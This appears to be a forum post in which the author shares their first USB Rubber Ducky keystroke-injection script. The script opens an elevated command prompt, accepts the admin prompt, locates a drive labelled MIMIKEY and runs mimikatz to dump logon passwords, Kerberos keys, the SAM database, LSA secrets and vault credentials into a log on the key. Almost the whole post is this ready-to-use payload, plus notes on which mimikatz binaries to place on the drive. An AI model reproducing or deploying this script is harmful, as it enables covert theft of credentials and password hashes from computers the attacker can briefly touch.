Hi everybody
After the gift from Darren @ Defcon, I have now made my own key ;) - I use cm_duck.hex
Enjoy my script, and let me know if any improvement needed (be nice, it's my first one )
DELAY 2000
GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb RunAs
ENTER
DELAY 1500
ALT o
DELAY 250
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "MIMIKEY"') do set MIMIKEY=%d
ENTER
DELAY 500
STRING cd /d %MIMIKEY%\
ENTER
DELAY 500
STRING mimikatz_%PROCESSOR_ARCHITECTURE% "log %computername%.log" version privilege::debug sekurlsa::logonpasswords sekurlsa::ekeys vault::cred vault::list token::elevate lsadump::sam lsadump::secrets vault::cred vault::list answer exit
ENTER
DELAY 500
STRING exit
ENTER
You only need at the root of the key:
mimikatz_x86.exe
mimikatz_amd64.exe
mimikatz will create a %computername%.log at the root of the key ;) It's faster than redirection.